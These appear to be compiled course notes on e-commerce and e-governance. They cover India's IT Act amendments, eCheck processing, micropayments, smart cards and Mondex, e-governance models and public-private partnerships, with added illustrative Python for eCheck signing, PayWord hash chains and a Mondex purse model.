The 2008 Amendment Act was passed in an eventful Parliamentary session on 23 December 2008 with no discussion in the House. Some cyber law observers have criticized the amendments on the ground of a lack of legal and procedural safeguards to prevent violation of the civil liberties of Indians. There has also been appreciation of the amendments from many observers because they address the issue of cyber security.

Section 69 empowers the Central Government/State Government or its authorized agency to intercept, monitor or decrypt any information generated, transmitted, received or stored in any computer resource if it is necessary or expedient so to do in the interest of the sovereignty or integrity of India, defence of India, security of the State, friendly relations with foreign States or public order, or for preventing incitement to the commission of any cognizable offence, or for investigation of any offence. They can also secure assistance from computer personnel in decrypting data (see mandatory decryption), under penalty of imprisonment.

Section 66A is widely criticized. It has led to numerous abuses reported by the press. Section 66A has also been criticised and challenged in the Lucknow and Madras High Courts for its constitutional validity. Based on Section 66A, the Bombay High Court has held that creating a website and storing false information on it can entail cyber crime.

Reaping the benefits of eChecks

Converting your customers' paper checks into electronic checks helps save time and reduces hassle for your staff, because you can submit payments electronically instead of making trips to the bank. However, time saving and hassle reduction are not the only benefits. Read on for more.

1 Reduce processing costs by up to 60%. eChecks require less manpower to process and don't come with any deposit or transaction fees. As a result, processing an eCheck is generally much cheaper than processing a paper check or credit card transaction.

2 Receive funds sooner. Businesses that use electronic check conversion have their funds deposited almost twice as fast as those using traditional check processing. Billing companies often receive payments within one day.

3 Increase sales. If your business doesn't accept paper checks, offering eChecks expands your customers' options and can increase sales. If you're converting from paper checks to eChecks, you can start accepting international and out-of-state checks while using account validation and customer authentication processes to protect your business from fraud.

4 Work smarter and greener. Electronic check conversion is easy to set up. It relies on the trusted ACH Network. And eChecks help reduce the more than 674 million gallons of fuel used and 3.6 million tons of greenhouse gas emissions created by transporting paper checks.

5 Decrease errors and fraud. eChecks reduce the potential for errors and fraud because fewer people handle them. Merchant service providers also maintain, monitor and check files against negative account databases that store information about individuals or companies that have records of fraud.

Protecting your business and your customers

Electronic check conversion is one of the most secure payment methods in the electronic payment processing industry because it uses the latest information protection features.

1 Authentication. Merchants must verify that the person providing the checking account information has the authority to use that account. Authentication services and products available to merchants include digital signatures and public key cryptography. Also known as digital certificates, digital signatures encrypt data in a way that gives the receiver a more reliable indication that the information was actually sent by the sender. They're used on the Internet to confirm the identity of a customer, much as a handwritten signature would. Because digital signatures are difficult to tamper with or imitate and are easily transportable, they're a good way to verify identity. Digital signatures are often used to implement electronic signatures, which include any electronic data that carries the intent of a signature. Public key cryptography is a security method that uses keys to encrypt and decrypt a sent message. With electronic check conversion, the private key is a secret mathematical calculation used to create the digital signature on the eCheck, and the public key is the key given to anyone who needs to verify that the sender signed the eCheck and that the electronic transfer has not been tampered with.

2 Duplicate detection. Financial institutions use software and operational controls to prevent and detect duplication of the scanned electronic representations of customer checks.

3 Encryption. The ACH Network automatically encrypts messages using 128-bit encryption and a secure sockets layer (SSL).

How to get started with electronic checks

Here's how to implement electronic check conversion as quickly and easily as possible.

1 Choose a well-established processing company. Good pricing is important, but working with a reliable processor is essential.

2 Notify your customers that your business will begin using electronic check conversion. Federal laws require you to post a notification about this change and give your customers a takeaway copy. You must also provide customers with a phone number to request more information.

3 Look for a processor that makes it easy to align your current business processes with your new electronic processing system, export customer data and integrate your new system with your business management software.

4 QuickBooks Payments offers a complete payment processing solution. Businesses can take payments from their customers in many ways, from ACH bank payments and electronic checks to credit cards, including Visa, MasterCard, Discover and American Express. In addition to offering many ways to get paid, QuickBooks Payments also enables businesses to email invoices to their customers with a Pay Now button. Our data shows us that businesses using QuickBooks Payments are getting paid twice as fast due to the e-invoicing feature.
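
The two controls described under "Protecting your business" above, a digital signature on the eCheck and duplicate detection, fit together in a few dozen lines. The block below is an added example and is not code from QuickBooks, CyberSource or any ACH processor: it signs a canonical eCheck record with a payer's private key and verifies it with the public key (textbook RSA with hash-then-sign, written out here so the example needs only the Python standard library), then refuses a re-presented check number. Two precisions the paragraph above glosses over: a signature does not encrypt the check, it lets anyone holding the public key confirm who signed it and that nothing changed; and a digital certificate is a separate object that binds a public key to an identity. The routing and account numbers, check number and payee are constructed placeholders. Textbook RSA without padding is unsuitable for real use; a production implementation would call RSA-PSS or ECDSA from a vetted library, and the processor would obtain the payer's public key through a certificate, not out of band as assumed here.

```python
import hashlib
import json
import secrets

# Added example: hash-then-sign over a canonical eCheck, plus duplicate detection.
# Textbook RSA (no padding) is used only so the example runs with the standard
# library; production code must use RSA-PSS/ECDSA from a vetted library.

_SMALL_PRIMES = (3, 5, 7, 11, 13, 17, 19, 23, 29, 31, 37, 41, 43, 47, 53, 59, 61, 67, 71)


def is_probable_prime(n: int, rounds: int = 24) -> bool:
    """Miller-Rabin test; callers pass odd n well above the small primes."""
    for p in _SMALL_PRIMES:
        if n % p == 0:
            return n == p
    d, r = n - 1, 0
    while d % 2 == 0:
        d //= 2
        r += 1
    for _ in range(rounds):
        a = 2 + secrets.randbelow(n - 3)
        x = pow(a, d, n)
        if x in (1, n - 1):
            continue
        for _ in range(r - 1):
            x = pow(x, 2, n)
            if x == n - 1:
                break
        else:
            return False  # no square root of 1 found: composite
    return True


def gen_prime(bits: int) -> int:
    while True:
        candidate = secrets.randbits(bits) | (1 << (bits - 1)) | 1  # odd, full length
        if is_probable_prime(candidate):
            return candidate


def keygen(bits: int = 512):
    """Return (public, private) as ((n, e), (n, d)). n exceeds the 256-bit hash."""
    e = 65537
    while True:
        p, q = gen_prime(bits // 2), gen_prime(bits // 2)
        phi = (p - 1) * (q - 1)
        if p != q and phi % e:  # e is prime, so this guarantees gcd(e, phi) == 1
            break
    return (p * q, e), (p * q, pow(e, -1, phi))


def canonical(echeck: dict) -> bytes:
    """Fixed serialization so signer and verifier hash exactly the same bytes."""
    return json.dumps(echeck, sort_keys=True, separators=(",", ":")).encode()


def sign_echeck(private, echeck: dict) -> int:
    n, d = private
    h = int.from_bytes(hashlib.sha256(canonical(echeck)).digest(), "big")
    return pow(h, d, n)


def verify_echeck(public, echeck: dict, signature: int) -> bool:
    n, e = public
    h = int.from_bytes(hashlib.sha256(canonical(echeck)).digest(), "big")
    return 0 < signature < n and pow(signature, e, n) == h


class EcheckProcessor:
    """Checks the payer's signature first, then rejects re-presented check numbers."""

    def __init__(self, payer_public) -> None:
        self.payer_public = payer_public  # assumed obtained via the payer's certificate
        self.seen = set()

    def submit(self, echeck: dict, signature: int) -> str:
        if not verify_echeck(self.payer_public, echeck, signature):
            return "rejected: bad signature"
        key = (echeck["routing"], echeck["account"], echeck["check_no"])
        if key in self.seen:
            return "rejected: duplicate"
        self.seen.add(key)
        return "accepted"


if __name__ == "__main__":
    pub, priv = keygen()
    check = {"routing": "123456789", "account": "000987654",   # constructed placeholders
             "check_no": 1042, "amount": "42.50", "payee": "Example Utility"}
    sig = sign_echeck(priv, check)
    proc = EcheckProcessor(pub)
    print(proc.submit(check, sig))                          # accepted
    print(proc.submit(check, sig))                          # rejected: duplicate
    print(proc.submit(dict(check, amount="420.50"), sig))   # rejected: bad signature
```

The duplicate key deliberately includes routing and account number as well as the check number, since check numbers are only unique per account; a real processor would also persist the seen set and bound it with a retention window.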

This diagram illustrates how real-time electronic check processing works using the CyberSource Payment Service:

1 Payer (customer/bill payer) is prompted to authorize an electronic debit and enter the bank routing number (ABA) and account number.

2 Merchant's sales system securely transfers order information to CyberSource over the Internet.

3 CyberSource forwards the bank routing number and account number to the processor.

4 The routing number and account number are validated and the integrity of the account's checking history is verified. The processor forwards approve/decline results to CyberSource.

5 CyberSource returns the approval/decline message to the merchant.

6 If approved, CyberSource routes the check for settlement through a processor to the Automated Clearinghouse System (ACH). Funds are deposited in approximately 1-3 business days.

Four Different Scenarios of the FSTC E-check System -

MICROPAYMENT METHODS

Traditional payment methods are called macropayment methods. A new type of payment method, known as micropayment, is emerging to cater for very low value transactions. Examples:

Millicent (pre-payment/credit based)

PayWord (post-payment)
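
PayWord, the post-payment example named above, avoids a signature per penny by letting the payer commit once to the root of a hash chain and then release successive links as payments; the vendor verifies each link with one hash per unit paid and settles the total later. The block below is an added example, not code from the PayWord authors or any deployed system: it builds the chain, has a hypothetical vendor accept links in increasing order, and shows the two checks that matter, replay (an index at or below the last accepted one) and a link that does not hash back to the last accepted word. In PayWord the root is delivered in a commitment signed by the payer; this example assumes the vendor has already verified that signature and starts from the root.

```python
import hashlib
import secrets
from typing import Optional

# Added example of a PayWord-style hash chain. The payer picks a secret seed w_n
# and derives w_{n-1}, ..., w_0 with w_i = H(w_{i+1}); w_0 is the committed root
# (its signed commitment is assumed verified out of band). Releasing w_i pays for
# i units in total, so each link is worth (i - last_index) units to the vendor.


def H(x: bytes) -> bytes:
    return hashlib.sha256(x).digest()


def make_chain(length: int, seed: Optional[bytes] = None) -> list:
    """Return [w_0, w_1, ..., w_length]; w_length is the payer's secret seed."""
    seed = seed or secrets.token_bytes(32)
    chain = [seed]
    for _ in range(length):
        chain.append(H(chain[-1]))
    chain.reverse()  # chain[0] is the root w_0, chain[i] hashes to chain[i-1]
    return chain


class Vendor:
    """Accepts paywords from one payer; each chain step is worth `unit_cents`."""

    def __init__(self, root: bytes, unit_cents: int = 1) -> None:
        self.last_word = root
        self.last_index = 0
        self.unit = unit_cents
        self.earned_cents = 0
        self.rejected = 0

    def accept(self, word: bytes, index: int) -> int:
        """Credit the payment and return cents earned by it; return 0 if rejected."""
        steps = index - self.last_index
        if steps <= 0:                      # replayed or out-of-order link
            self.rejected += 1
            return 0
        x = word
        for _ in range(steps):              # one hash per unit being paid
            x = H(x)
        if x != self.last_word:             # link is not on the committed chain
            self.rejected += 1
            return 0
        self.last_word, self.last_index = word, index
        credited = steps * self.unit
        self.earned_cents += credited
        return credited


if __name__ == "__main__":
    chain = make_chain(100)            # payer side: 100 one-cent paywords
    vendor = Vendor(chain[0])          # vendor side: knows only the root
    print(vendor.accept(chain[3], 3))  # 3 cents
    print(vendor.accept(chain[7], 7))  # 4 more cents
    print(vendor.accept(chain[5], 5))  # 0: replay of an already-passed index
    print(vendor.earned_cents)         # 7
```

The vendor keeps only the last accepted word and index, so storage is constant per payer, and the cost of checking a payment of k units is k hashes rather than a signature verification; the payer cannot forge a later link without inverting the hash, and the vendor cannot claim more than the highest link it was actually given.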

MICROPAYMENT IS -

Very small payments made over the Web

Transactions too small for credit cards

Can be as little as a fraction of a cent

Alternative to subscription and advertising

Can go in either direction

A micropayment is an e-commerce transaction involving a very small sum of money in exchange for something made available online, such as an application download, a service or Web-based content.

Micropayments are sometimes defined as anything less than 75 cents and can be as low as a fraction of a cent. A special type of system is required for such payments, which are too small to be feasible for processing through credit card companies.

Here's one scheme for micropayment. The user and seller each establish an account with a third-party service provider who monitors, collects and distributes micropayments. The seller encodes per-fee links inside a Web page. When the user initiates a transaction, payment goes through an Internet wallet account managed by the service provider. Micropayments accumulate until they are collected as single larger payments. Such a system is helpful when a user wants to make one-time micropayments to multiple sellers. Seller-based accounts are more common for repeat business with an individual enterprise.

Once a common micropayment standard has been established, some experts predict that streaming media sites, music and application downloads, content vendors, sports access sites and other specialized resources will make pay-per-use common online.

Advantages and risks -

With a micropayment system, many small transactions are summarised over a defined period of time and charged in one bill. For that reason, micropayments are applicable for businesses where even small costs for every single transaction would be inefficient. [4] The main benefits on the customer side of using micropayment are speed and flexibility. From the merchants' side, speed and acceptable transaction fees are very important. As the transactions involve small amounts of capital, security does not have the highest priority. Much more important than security is trust: users and merchants are more likely to use an insecure payment system from a trusted company than a secure payment system from an untrusted (unknown) company. Therefore the market entry barriers for new providers are high. Any company that wishes to enter this area must have plenty of capital and be willing to invest a lot before any return on investment, as it is extremely difficult for new payment systems to achieve widespread acceptance.

Payment options -

Micropayment providers offer various payment modules. Merchants need to sign up for an account with a chosen provider and decide on a module that suits their needs. The customer gets an option (or options) for how to pay for the desired content or goods.

The most common micropayment options are listed below. [6]

Call2pay - Payment by telephone. The customer is requested to call a toll number. The fee is set on a per-call basis for the desired payment amount.

Handypay - Payment via mobile phone bill. The customer enters his or her cell phone number and receives an SMS with a TAN in order to confirm payment.

Ebank2pay - Payment using online banking. The customer transfers the payment amount using his or her online banking access and a TAN. After making payment, the customer receives access to the purchased product.

Credit card - Payment per credit card. The customer enters his credit card data and confirms the transaction. The transactions can optionally be carried out with the 3-D Secure method (Verified by Visa and Mastercard SecureCode).

Direct debit - Payment by direct debit. The customer enters his or her bank ID and account number and confirms the direct debit authorization.

PayPal MicroPayments is a micropayment system that charges payments to users' PayPal accounts and allows transactions of less than US$12 to take place. The service is, as of 2013, offered in select currencies only.

Micropayment Uses -

Publishing

Marketing

Software

Entertainment

Web Services

SMART CARD

A smart card, chip card or integrated circuit card (ICC) is any pocket-sized card with embedded integrated circuits. Smart cards are made of plastic, generally polyvinyl chloride, but sometimes polyethylene terephthalate based polyesters, acrylonitrile butadiene styrene or polycarbonate. Since April 2009, a Japanese company has manufactured reusable financial smart cards made from paper.

Smart cards can provide identification, authentication, data storage and application processing.[2] Smart cards may provide strong security authentication for single sign-on (SSO) within large organizations.

A smart card is any pocket-sized card with embedded integrated circuits which can process data. This implies that it can receive input which is processed and delivered as an output.

What is a Smart Card?

Standard credit card-sized, with a microchip embedded on it

Two types:

Memory-only chips

Microprocessor chips

Can hold up to 32000 bytes

Newer smart cards have math co-processors, which perform complex encryption routines quickly

In 1968, German inventors patented the combination of plastic cards with microchips

Construction of Smart Cards -

Why Smart Cards -

Improve the convenience and security of any transaction

Provide tamper-proof storage of user and account identity

Provide vital components of system security

Protect against a full range of security threats

Advantages -

Flexibility

Security

Portability

Increasing data storage capacity

Reliability

Schematic overview of a smart card

Smart card Processing

Smart Card Applications -

Ticketless travel

Seoul bus system: 4M cards, 1B transactions since 1996

Planned: the SF Bay Area system

Authentication, ID

Medical records

Ecash

Store loyalty programs

Personal profiles

Government

Licenses

Mall parking

Example: Mondex

OVERVIEW OF MONDEX

Mondex is a smart card electronic cash system which was originally developed by National Westminster Bank in the United Kingdom and subsequently sold to MasterCard International. Mondex launched in a number of markets during the 1990s, expanding from an original trial in Swindon, UK, to Hong Kong, Guelph and New York. It was also trialled on several British university campuses from the late 1990s, including the University of Edinburgh, University of Exeter (between 1997 and 2001), University of York, University of Nottingham, Aston University and Sheffield Hallam University.

Direct transfer of electronic money between two cards

Transfer of electronic money over the Internet or telephone networks, etc.

Keep transaction records

Password protection and "lock card" functions

Portable balance finder to check balance

Support for multiple currencies

ADVANTAGES

CONSUMER -

Convenience

Accessibility

On chip record of recent transactions

Home load

Internet purchases

MERCHANT -

Reliable off-line payment

Higher security

Low transaction cost

Reduced cash handling

FINANCIAL INSTITUTION -

Strengthen customer relationships

New financial and commercial partnerships

Mondex is a concept for an electronic payment system that provides an alternate to cash particularly small currency and coins (micro-payment) The concept was invented in 1990 by Tim Jones and Graham Higgins at National Westminster Bank (NatWest) in the UK

In July 1996 initiated by NatWest and Midland Bank PLC Mondex International Ltd was officially established by 17 major banks from North America AsiaPacific and Europe and was granted an exclusive licensing agreement with NatWest for the intellectual property rights to develop the Mondex concept technology and brand In the same year MasterCard International acquired 51 ownership of Mondex International and fully endorsed the Mondex technology architecture

How does Mondex Protect Privacy –

Principles protected:

o Limits for collecting personal information
o Limits for using, disclosing and keeping personal information
o Keeping personal information accurate
o Safeguarding personal information

Limits for collecting personal information

o loads from account
o deposits into account
o lost transactions

Limits for using, disclosing and keeping personal information

o safeguard deposits
o to reimburse for non-performance

Keeping personal information accurate

o load and unload are online
o a rolling log of 10 transactions provides the exact spend and retailer name

Safeguarding personal information

o firewalls in Multos between applications (ITSEC E6 designation)
o transaction data sent to the retailer is deliberately limited
o individual transaction data is not collected by banks: Mondex is an unaudited system


The design of a Mondex smart card allows end users to transfer funds electronically onto the card and then use the Mondex smart card to make purchases up to the total cash value held on the card. Mondex smart cards provide an electronic payment system using all the capabilities associated with smart card technology. The Mondex smart card can be a convenient alternative to cash.

Although the design was five years old at the time, the Mondex smart card was actually launched in 1995 – two years before MasterCard assumed control of the technology.

The banks that currently support the Mondex smart card include National Bank of Canada, Scotiabank, Canada Trust, Bank of Montreal, Le Mouvement des caisses Desjardins and Toronto Dominion Bank. With so many respected lending institutions banking on the idea, the Mondex smart card is worth a closer look.

The Mondex smart card has the ability to make card-to-card transfers, which is not possible with standard credit or debit cards. When you use a credit/debit card to make a purchase, communication is required between the bank and your card. Mondex cards, however, contain an embedded microprocessor with sophisticated encryption methods and tamper-proof hardware designed to protect them from hackers. The ability of the Mondex smart card to do offline transactions means it is less dependent on expensive network infrastructure, reducing transaction costs. Offline transactions may seem anonymous; however, they are actually recorded in the digital memory of the card's microprocessor and remain retrievable the next time the card is used at an ATM, or as soon as the retailer uploads transaction data to the bank computer.

A significant disadvantage with Mondex is that transactions aren't truly anonymous. Unlike pre-paid phone cards, which are also based on smart card technology, you can't purchase a Mondex card without revealing your identity. Each card has a unique identification number through which owners can easily be identified. Mondex smart cards have not been as successful as originally predicted. Customers have not been especially satisfied with the card and its services. Unlike a credit or debit card, your money may be lost forever if you should lose a Mondex smart card. Losing a Mondex card is just like losing a wallet full of cash. With a credit card you're protected against any loss exceeding $50. This protection is not currently available with a Mondex smart card.

According to the Mondex smart card system, it is fully auditable. There is a log of the time, date, amount and participants of each transaction, which hampers the privacy of users. Technically, however, Mondex can't claim to be a fully auditable system. After a number of transactions, overflow can occur as a result of the limited memory in the Mondex smart cards. This means that significant data may be lost before Mondex is able to retrieve it. Critics say this loss of data is a critical design flaw, making it difficult for Mondex to reliably detect fraud.

While Mondex smart cards are not a hundred percent secure, they do possess the ability to tolerate minor fraud loss.

Mondex believes their electronic payment system is secure. They are convinced that critics who have voiced concern over security issues are mistaken and misinformed. Perhaps the use of a Mondex smart card depends on a personal level of trust.
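The offline card-to-card transfer and the bounded on-card transaction log discussed above can be seen concretely in a small model. The following Python is an added illustration written for these notes; it is not Mondex's own code or value-transfer protocol. It assumes a log capacity of 10 entries (the "rolling 10 transactions" figure from the privacy section), a PIN-based lock function, and a per-card sequence counter; the real purse-to-purse cryptography is deliberately not modelled. The point it demonstrates is the auditability limit: once more transactions occur than the log can hold, the oldest entries are gone before the bank ever sees them.

```python
from collections import deque
from dataclasses import dataclass, field

LOG_CAPACITY = 10  # assumption: the "rolling 10 transactions" log described in the notes


@dataclass
class Purse:
    """Toy model of a Mondex-style purse: the value lives on the card itself."""
    card_id: str
    balance: int                      # value in the smallest currency unit, held on-chip
    sequence: int = 0                 # per-card counter so each transfer is unique
    log: deque = field(default_factory=lambda: deque(maxlen=LOG_CAPACITY))
    locked: bool = False              # the "lock card" function from the feature list

    def lock(self) -> None:
        self.locked = True

    def unlock(self, pin: str, expected_pin: str) -> bool:
        # Password protection: only the correct PIN unlocks the purse.
        if pin == expected_pin:
            self.locked = False
        return not self.locked


def card_to_card_transfer(payer: Purse, payee: Purse, amount: int, retailer: str) -> bool:
    """
    Offline card-to-card transfer: no bank is contacted. Both purses are
    updated locally and each records the transaction in its rolling log.
    Returns True on success, False if the transfer is refused.
    """
    if payer.locked or payee.locked:
        return False
    if amount <= 0 or amount > payer.balance:
        return False  # value cannot be created: a card can only spend what it holds
    payer.sequence += 1
    payer.balance -= amount
    payee.balance += amount
    record = {"seq": payer.sequence, "from": payer.card_id, "to": payee.card_id,
              "amount": amount, "retailer": retailer}
    payer.log.append(record)   # deque(maxlen=...) silently drops the oldest entry
    payee.log.append(record)
    return True


def upload_log(purse: Purse) -> list:
    """What the bank sees when the card is next presented at an ATM or the
    retailer uploads data: only what is still in the rolling log."""
    return list(purse.log)


def demo() -> dict:
    """Twelve small purchases: two more than the log can hold."""
    alice = Purse("CARD-A", balance=10_000)      # constructed sample cards
    shop = Purse("CARD-SHOP", balance=0)
    for i in range(12):
        card_to_card_transfer(alice, shop, 100, retailer=f"Shop #{i}")
    seen_by_bank = upload_log(alice)
    return {
        "alice_balance": alice.balance,
        "shop_balance": shop.balance,
        "transactions_made": alice.sequence,
        "transactions_recoverable": len(seen_by_bank),
        "first_recoverable_seq": seen_by_bank[0]["seq"],   # sequences 1 and 2 are lost
    }
```

Balances stay consistent because value is only moved, never created, but the bank can reconstruct only the last ten transfers; the gap between `transactions_made` and `transactions_recoverable` is exactly the fraud-detection blind spot the critics describe.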

E-GOVERNANCE

Although the term 'e-Governance' has gained currency in recent years, there is no standard definition of this term. Different governments and organizations define this term to suit their own aims and objectives. Sometimes the term 'e-government' is also used instead of 'e-Governance'.

Several dimensions and factors influence the definition of e-governance or electronic governance. The word "electronic" in the term e-governance implies technology-driven governance. E-governance is the application of information and communication technology (ICT) for delivering government services, exchange of information, communication transactions, and integration of various stand-alone systems and services between government-to-customer (G2C), government-to-business (G2B) and government-to-government (G2G), as well as back office processes and interactions within the entire government framework. Through e-governance, government services will be made available to citizens in a convenient, efficient and transparent manner. The three main target groups that can be distinguished in governance concepts are government, citizens and businesses/interest groups. In e-governance there are no distinct boundaries.

Generally four basic models are available – government-to-citizen (customer), government-to-employees, government-to-government and government-to-business.

Difference between E-Government and E-Governance –

Both terms are often treated as the same; however, there is some difference between the two. E-government is the use of ICTs in public administration, combined with organizational change and new skills, to improve public services and democratic processes and to strengthen support to the public. The problem with this definition, if it is to be congruent with the definition of e-governance, is that it makes no provision for the governance of ICTs. As a matter of fact, the governance of ICTs most probably requires a substantial increase in regulation and policy-making capabilities, with all the expertise and opinion-shaping processes among the various social stakeholders of these concerns. So the perspective of e-governance is the use of technologies that both help governing and have to be governed. Public-Private Partnership (PPP) based e-governance projects are hugely successful in India. United Telecoms Limited, known as UTL, is a major player in India on PPP-based e-governance projects; each project involved a mammoth state-wide area network in the respective state.

E-governance is the future many countries are looking forward to for a corruption-free government. E-government is a one-way communication protocol, whereas e-governance is a two-way communication protocol. The essence of e-governance is to reach the beneficiary and ensure that the services intended for the desired individual have actually been delivered. There should be an auto-response to support the essence of e-governance, whereby the Government realizes the efficacy of its governance. E-governance is by the governed, for the governed and of the governed.

Establishing the identity of the end beneficiary is a challenge in all citizen-centric services. Statistical information published by governments and world bodies does not always reveal the facts. The best form of e-governance cuts down on the unwanted interference of too many layers while delivering governmental services. It depends on a good infrastructural setup, with the support of local processes and parameters, for governments to reach their citizens or end beneficiaries. Budgets for planning, development and growth can be derived from well laid out e-governance systems.

Why e-Governance?

E-Government can transform citizen service, provide access to information to empower citizens, enable their participation in government and enhance citizens' economic and social opportunities, so that they can make better lives for themselves and for the next generation.

BASIC ARCHITECTURE

A suggested architecture for e-Governance is shown in the diagram, where it is illustrated that applications from various departments can be integrated together so as to be accessed by any terminal or computer from any other department, or from anywhere through the network. This is because of the characteristics of CORBA: it is a location-transparent, language-independent, implementation-independent and operating-system-independent architecture. The applications connected through CORBA/IIOP could be legacy applications wrapped to suit CORBA specifications, any new Web application, or even a database environment using Oracle, etc. Seamless interconnection, and thereby effective utility of the entire system of e-Governance, is possible if the middleware is designed to have the necessary services like Transactions, Database Management, Messaging and Naming.

Regarding security aspects, the CORBA Security standard is built around existing security specifications such as the Distributed Computing Environment (DCE), the Kerberos protocol and the Generic Security Service (GSS) API. While these technologies carry considerable weight, public key security with Secure Sockets Layer (SSL) is popular with Internet-based transactions.

Types of Interactions in e-Governance

e-Governance facilitates interaction between different stakeholders in governance. These interactions may be described as follows.

G2G (Government to Government)

In this case, Information and Communications Technology is used not only to restructure the governmental processes involved in the functioning of government entities but also to increase the flow of information and services within and between different entities. This kind of interaction is only within the sphere of government and can be both horizontal, i.e. between different government agencies as well as between different functional areas within an organization, or vertical, i.e. between national, provincial and local government agencies as well as between different levels within an organization. The primary objective is to increase efficiency, performance and output.

G2C (Government to Citizens)

In this case, an interface is created between the government and citizens which enables the citizens to benefit from efficient delivery of a large range of public services. This expands the availability and accessibility of public services on the one hand and improves the quality of services on the other. It gives citizens the choice of when to interact with the government (e.g. 24 hours a day, 7 days a week), from where to interact with the government (e.g. service centre, unattended kiosk or from one's home/workplace) and how to interact with the government (e.g. through internet, fax, telephone, email, face-to-face, etc.). The primary purpose is to make government citizen-friendly.

G2B (Government to Business)

Here e-Governance tools are used to aid the business community – providers of goods and services – to seamlessly interact with the government. The objective is to cut red tape, save time, reduce operational costs and create a more transparent business environment when dealing with the government. The G2B initiatives can be transactional, such as in licensing, permits, procurement and revenue collection. They can also be promotional and facilitative, such as in trade, tourism and investment. These measures help to provide a congenial environment to businesses to enable them to perform more efficiently.

G2E (Government to Employees)

Government is by far the biggest employer and, like any organization, it has to interact with its employees on a regular basis. This interaction is a two-way process between the organization and the employee. Use of ICT tools helps in making these interactions fast and efficient on the one hand and increases satisfaction levels of employees on the other.

Difference between G2B and B2G

Government to business (G2B): refers to the conducting of transactions between government bodies and business via the internet.

Business to government (B2G): professional affairs conducted between companies and regional, municipal or federal governing bodies. B2G typically encompasses the determination and evaluation of proposals and the completion of contracts.

PUBLIC PRIVATE PARTNERSHIPS

• Agreement between Government and the Private Sector for the Provision of a Public Good or Service by the Latter
• Generally, but not always, involving
  – Long Term Contracts
  – User Charges and/or Payments flowing between the Parties
  – Shared Investments, but Mainly Private
  – Risk Sharing by the Parties
• Must be a Partnership

A public-private partnership exists when public sector agencies (federal, state or local) join with private sector entities (companies, foundations, academic institutions or citizens) and enter into a business relationship to attain a commonly shared goal that also achieves objectives of the individual partners.

Why do them?

• Fiscal Head Room
• As a Way of Financing the Project
• Separate Policy & Regulation from Operations
• Make the Good or Service Available
• Pay for Performance and Output
• Introduce Competition – For and In the Market

The Need to Set the Right Priorities –

Four Basic Dimensions of P3

Although each is unique, all P3's include four basic characteristics:

Shared goals
Shared resources (time, money, expertise, people)
Shared risks
Shared benefits

Benefits

Expedited project completion
Project cost savings
Improved quality
Use of private resources
Access to new sources of private capital

Two Major Steps

Crafting the Partnership
Implementing the Partnership

Project Management –

Six Distinct Phases

Genesis

What's the need?
What's driving the need (rationale)? Facility non-compliance, natural disaster, budget deficit
Is there a need for a Public/Private Partnership?

Preliminary Project Definition

Feasibility: Is a Public/Private Partnership feasible, not only financially but practically? Can it be done?
Market Research
Economic/Financial Analysis
Program, Budget and Schedule
Risk Analysis

Plan and Test

Final project definition
What is the best way to complete the project?
Has the plan been thoroughly tested to assess market demand, public and stakeholder feedback and economics?
Master Schedule/Budget
Political Climate
Any potential "fatal flaws" that could derail the project?

Procurement and Contracting

How do you choose and contract with the best-value private partner?
What's the best delivery method? Design-Bid-Build, Design-Build, Finance-Design-Build
What do current statutes allow?
Procurement Approach: Sole Source, RFP, Low Bid
Risk Allocation between Public and Private Partners
Structuring of Contract/Risks and Rewards

Implement

Environmental
Design
Permitting
Construction
Commissioning and Administration

Operate

Startup
Monitoring
Assessment
Enhancement
Contract Modifications
Contract Renegotiations

READINESS IN E-GOVERNANCE

A high level of readiness to develop and implement e-government services is a prerequisite for a high-performing and innovative public sector that delivers integrated services, making life easier for citizens and businesses. E-government readiness is therefore a significant indicator of whether a country is prepared to harvest efficiencies gained from ICT-enabled public administrations.

The UN's e-government readiness index is a combined indicator of the supply of, potential demand for, and maturity of e-government services. OECD member countries exhibit a high capacity to develop and implement e-government services. This is generally characterized by an extensive broadband infrastructure, a repository of electronic information on government laws and policies (including links to archived information and downloadable forms), and a high level of comfort with ICT by citizens and businesses. Countries with the highest readiness index tend to also have a large number of transactional and e-commerce features on their government websites. As noted by the UN in its 2008 e-government survey, the Scandinavian countries, with the top three scores on the readiness index, all generally share similar e-government environments (e.g. the accessibility and penetration of the electronic infrastructure) and strategies (e.g. the online provision of services). Each country has two main government websites: one that is informative and another that is a gateway for e-government services. In addition, citizens and businesses are able to access many services and complete many transactions online. However, similar levels of e-government readiness can also result from different strategic approaches.

Internet access is a prerequisite for citizens and businesses to use e-government services, and thus a leading indicator of countries' readiness to harness the potential efficiencies of ICT. Broadband penetration has increased dramatically in most OECD member countries in the past five years, as countries have made significant investments in their telecommunications infrastructure.

SECURITY ISSUES IN E-GOVERNANCE

1. INTRODUCTION

The term e-Government is defined by the Organization for Economic Cooperation and Development (OECD) as the use of new information and communication technologies (ICTs) by governments as applied to the full range of government functions. In particular, the networking potential offered by the Internet and related technologies has the potential to transform the structures and operation of government.

The effective management of information security is a key factor, as the willingness of the different users (citizens and other parties) to use e-Government services will heavily depend on the trust they have in the data security of the service.

2. INFORMATION SECURITY

A central challenge of e-Government service is how the new technology can be used not only to increase efficiency for public administration but also to strengthen confidence in privacy measures by creating mutual transparency between public administration and citizens.

The process approach for an information security management system (ISMS) encourages its users to emphasize the importance of:

understanding an organization's information security requirements and the need to establish policy and objectives for information security;
implementing and operating controls to manage an organization's information security risks in the context of the organization's overall business risks;
monitoring and reviewing the performance and effectiveness of the ISMS;
continual improvement based on objective measurement.

Data security requires a set of security requirements:

Authentication: capability to identify who is using the services (person or software program); the process of verifying that you are who you say you are.
Authorization: capability to grant rights of access to resources; the process of verifying that someone has the rights to do what she is trying to do.
Confidentiality: capability to prevent unauthorized access to information.
Integrity: capability to prevent information from unauthorized modification, ensuring that information can be relied upon and is accurate and complete.
Traceability: capability to chronologically interrelate any transaction to the person or system that performed the action, in a way that is verifiable.
Non-repudiation: capability to prevent the intervening person or system in an event or action from denying or challenging their participation in the event.
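To make the requirements above concrete, here is an added Python sketch of a single e-Government service request passing through authentication, authorization, integrity and traceability checks in order. It is an illustration written for these notes, not code from any real e-Government system; the account names, the service key and the "tax return" form are constructed sample values. It uses only the standard library: PBKDF2 for password verification, an HMAC tag for integrity, and a hash-chained audit log for traceability. Two requirements on the list are deliberately not claimed by it: the HMAC shares one key between service and verifier, so it proves integrity but not non-repudiation (a per-user digital signature would be needed for that), and confidentiality is a transport concern (TLS) outside this snippet.

```python
import hashlib
import hmac
import os
from datetime import datetime, timezone

# Constructed demo state; a real service would keep this in a database.
USERS = {}           # username -> {"salt": bytes, "hash": bytes, "roles": set}
AUDIT_LOG = []       # append-only list of hash-chained records
SERVICE_KEY = b"constructed-demo-key-not-for-production"   # assumption: server-side secret
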